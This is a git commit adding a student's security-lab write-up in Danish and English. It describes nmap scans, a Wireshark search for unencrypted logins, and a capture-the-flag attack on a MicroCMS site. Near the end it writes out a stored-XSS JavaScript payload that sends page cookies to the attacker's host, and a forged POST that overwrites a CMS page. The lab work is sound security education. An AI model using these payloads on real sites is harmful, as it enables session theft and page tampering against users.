From 5f685d13741afa720f8866a3e412beab11c279e4 Mon Sep 17 00:00:00 2001
From: Julian T <julian@jtle.dk>
Date: Fri, 29 May 2020 11:33:16 +0200
Subject: Added missing sec assignments

---
 sem4/sec/t3/ifconfig.png          | Bin 0 -> 211904 bytes
 sem4/sec/t3/microcms_403.png      | Bin 0 -> 29305 bytes
 sem4/sec/t3/microcms_404.png      | Bin 0 -> 30029 bytes
 sem4/sec/t3/microcms_bold.png     | Bin 0 -> 40777 bytes
 sem4/sec/t3/microcms_front.png    | Bin 0 -> 19276 bytes
 sem4/sec/t3/microcms_java.png     | Bin 0 -> 32763 bytes
 sem4/sec/t3/microcms_url.png      | Bin 0 -> 32103 bytes
 sem4/sec/t3/nmap1.png             | Bin 0 -> 172875 bytes
 sem4/sec/t3/opgaver.md            | 127 ++++++++++++++++++++++++++++++++++++++
 sem4/sec/t3/os.png                | Bin 0 -> 95809 bytes
 sem4/sec/t3/php-server.png        | Bin 0 -> 28422 bytes
 sem4/sec/t3/portscan.png          | Bin 0 -> 57419 bytes
 sem4/sec/t3/stealth.png           | Bin 0 -> 65266 bytes
 sem4/sec/t3/webserver.png         | Bin 0 -> 46017 bytes
 sem4/sec/t3/webserver_firefox.png | Bin 0 -> 46295 bytes
 sem4/sec/t3/wireshark_post.png    | Bin 0 -> 22908 bytes
 16 files changed, 127 insertions(+)
 create mode 100644 sem4/sec/t3/ifconfig.png
 create mode 100644 sem4/sec/t3/microcms_403.png
 create mode 100644 sem4/sec/t3/microcms_404.png
 create mode 100644 sem4/sec/t3/microcms_bold.png
 create mode 100644 sem4/sec/t3/microcms_front.png
 create mode 100644 sem4/sec/t3/microcms_java.png
 create mode 100644 sem4/sec/t3/microcms_url.png
 create mode 100644 sem4/sec/t3/nmap1.png
 create mode 100644 sem4/sec/t3/opgaver.md
 create mode 100644 sem4/sec/t3/os.png
 create mode 100644 sem4/sec/t3/php-server.png
 create mode 100644 sem4/sec/t3/portscan.png
 create mode 100644 sem4/sec/t3/stealth.png
 create mode 100644 sem4/sec/t3/webserver.png
 create mode 100644 sem4/sec/t3/webserver_firefox.png
 create mode 100644 sem4/sec/t3/wireshark_post.png

(limited to 'sem4/sec/t3')

diff --git a/sem4/sec/t3/ifconfig.png b/sem4/sec/t3/ifconfig.png
new file mode 100644
index 0000000..b4e42e8
Binary files /dev/null and b/sem4/sec/t3/ifconfig.png differ
diff --git a/sem4/sec/t3/microcms_403.png b/sem4/sec/t3/microcms_403.png
new file mode 100644
index 0000000..7315fef
Binary files /dev/null and b/sem4/sec/t3/microcms_403.png differ
diff --git a/sem4/sec/t3/microcms_404.png b/sem4/sec/t3/microcms_404.png
new file mode 100644
index 0000000..737b779
Binary files /dev/null and b/sem4/sec/t3/microcms_404.png differ
diff --git a/sem4/sec/t3/microcms_bold.png b/sem4/sec/t3/microcms_bold.png
new file mode 100644
index 0000000..1d378d3
Binary files /dev/null and b/sem4/sec/t3/microcms_bold.png differ
diff --git a/sem4/sec/t3/microcms_front.png b/sem4/sec/t3/microcms_front.png
new file mode 100644
index 0000000..3161537
Binary files /dev/null and b/sem4/sec/t3/microcms_front.png differ
diff --git a/sem4/sec/t3/microcms_java.png b/sem4/sec/t3/microcms_java.png
new file mode 100644
index 0000000..a4a2883
Binary files /dev/null and b/sem4/sec/t3/microcms_java.png differ
diff --git a/sem4/sec/t3/microcms_url.png b/sem4/sec/t3/microcms_url.png
new file mode 100644
index 0000000..259492c
Binary files /dev/null and b/sem4/sec/t3/microcms_url.png differ
diff --git a/sem4/sec/t3/nmap1.png b/sem4/sec/t3/nmap1.png
new file mode 100644
index 0000000..21c955c
Binary files /dev/null and b/sem4/sec/t3/nmap1.png differ
diff --git a/sem4/sec/t3/opgaver.md b/sem4/sec/t3/opgaver.md
new file mode 100644
index 0000000..454d8fe
--- /dev/null
+++ b/sem4/sec/t3/opgaver.md
@@ -0,0 +1,127 @@
+# Opgaver til T3 del 1
+
+> Brug ifconfig til at finde ud af hvilket netværk I er på, og hvilke andre maskiner der potentielt kan være på samme netværk.
+
+Først finder jeg ip.
+
+![Ifconfig](ifconfig.png)
+
+Derefter laver jeg en ip scan på netwærket.
+Læg mærke til ip og mask da dette skal bruges igen i nmap.
+
+![nmap efter port](nmap1.png)
+
+Her kan jeg se at der er nogle forskellige enheder der **svarer**.
+
+- 10.150.89.2
+- 10.150.89.3
+- 10.150.89.4
+- 10.150.89.5
+- 10.150.89.31
+- 10.150.89.41
+- 10.150.89.51
+- 10.150.89.108
+- 10.150.89.159
+- 10.150.89.164
+
+> Brug nmap til at finde andre maskiner i netværket. Prøv forskellige typer af scanninger, og evaluer hvilke informationer I får ud af det vs. hvor lang tid det tager at gennemføre scanningerne.
+
+Først prøves en simpel fuld portscan.
+
+![Nmap port scan](portscan.png)
+
+Dette tog 2.19 sekunder.
+
+Derefter prøves en stealth scan
+
+![Nmap stealth scan](stealth.png)
+
+Dette tog 2.45 sekunder. 
+Og giver det samme resultat som en normal portscan.
+
+> Brug nmap til at finde ud af hvilke operativsystemer der kører på de forskellige maskiner i lab'et.
+
+Nu prøves en OS scan hvor den kigger på finger prints.
+Dette gøres med `-O`.
+
+![Os scan](os.png)
+
+Dette tog 7.17 sekunder.
+Man kan også se at den har fundet information om hvilket OS og version modtager bruger.
+Det er også sjovt at se at den ikke har kunne bestemme `10.150.89.2`.
+
+> Find en web-server (der kun er web-server).
+
+Her kigges i resultaterne fra den sidste scan.
+
+![Webserver scan](webserver.png)
+
+Nu checkes der om det faktisk er en webserver der lytter.
+
+![Webserver test](webserver_firefox.png)
+
+Yay.
+
+> Al trafik i lab'et kører gennem jeres Kali-maskine. Kan I finde et ikke-krypteret login et sted i trafikken? (brug Wireshark)
+
+Login kommer tit gennem http POST request, så det kan man prøve at sortere efter i wireshark.
+
+![Wireshark post request filter](wireshark_post.png)
+
+> Prøv at find flaget i MicroCMS hjemmesiden - det kræver lidt kreativitet, men ingen værktøjer
+
+Efter at have kigget lidt på de forskellige servere blev MicroCMS hjemmesiden fundet på `10.150.89.164`.
+
+![Microcms front page](microcms_front.png)
+
+Det ser ud til at man kan lave sider og man kan redigere sidder.
+Den mest aktive ser ud til at være `Event 1` der snakker om et møde i næste uge.
+
+Først prøver jeg at redigere `Event 1` ved at tilføje lidt tekst.
+Efter redigering er testes indsættes `hej med <b>dig</b>`.
+
+![Microcms edit bold](microcms_bold.png)
+
+Yay det virker, så kan man måske også indsætte billeder og javascript.
+Hvis der er andre der også er på siden, hvad kan man så få ud af dem?
+
+Url'erne til at få en side har følgende format `/page.php?view=2`.
+Hvad hvis man prøver nogle af de andre tal efter 2.
+
+![Microcms Not found](microcms_404.png)
+
+That was expected.
+
+![Microcms forbidden](microcmd_403.png)
+
+What if we change `view` to `edit`?
+
+![Microcmd url](microcms_url.png)
+
+Okay. Can we place some javascript that will send the content of this page to a webserver?
+Lets start with one that sends all cookies.
+
+```
+var x = new XMLHttpRequest; x.open("GET", "http://10.150.89.5:4000/" + document.cookie, true); x.send( null )
+```
+
+This will send a GET with the cookie in the url.
+On the local kali machine a webserver is started with php -S.
+This will print all request send, even if they 404.
+
+![Mini php http server](php-server.png)
+
+Now this javascript is placed as a script tag in the `Event 1` document.
+
+![Microcms javascript](microcms_java.png)
+
+After waiting a short while nothing happened.
+Going to try something else.
+The following will edit page 11 with some data ( in this case "hej medddd dig" ).
+
+```
+var x = new XMLHttpRequest; x.open("POST", "http://10.150.89.164/page.php?edit=11", true); var f = new FormData(); f.append("title", "testi"); f.append("content", "hej medddd dig"); x.send( f )
+```
+
+Now content is replaced by document.cookie and placed in meeting thing.
+
diff --git a/sem4/sec/t3/os.png b/sem4/sec/t3/os.png
new file mode 100644
index 0000000..ef361ab
Binary files /dev/null and b/sem4/sec/t3/os.png differ
diff --git a/sem4/sec/t3/php-server.png b/sem4/sec/t3/php-server.png
new file mode 100644
index 0000000..6f34499
Binary files /dev/null and b/sem4/sec/t3/php-server.png differ
diff --git a/sem4/sec/t3/portscan.png b/sem4/sec/t3/portscan.png
new file mode 100644
index 0000000..da16319
Binary files /dev/null and b/sem4/sec/t3/portscan.png differ
diff --git a/sem4/sec/t3/stealth.png b/sem4/sec/t3/stealth.png
new file mode 100644
index 0000000..098d49b
Binary files /dev/null and b/sem4/sec/t3/stealth.png differ
diff --git a/sem4/sec/t3/webserver.png b/sem4/sec/t3/webserver.png
new file mode 100644
index 0000000..24f480b
Binary files /dev/null and b/sem4/sec/t3/webserver.png differ
diff --git a/sem4/sec/t3/webserver_firefox.png b/sem4/sec/t3/webserver_firefox.png
new file mode 100644
index 0000000..1fa4b29
Binary files /dev/null and b/sem4/sec/t3/webserver_firefox.png differ
diff --git a/sem4/sec/t3/wireshark_post.png b/sem4/sec/t3/wireshark_post.png
new file mode 100644
index 0000000..4cd260e
Binary files /dev/null and b/sem4/sec/t3/wireshark_post.png differ
-- 
cgit v1.2.3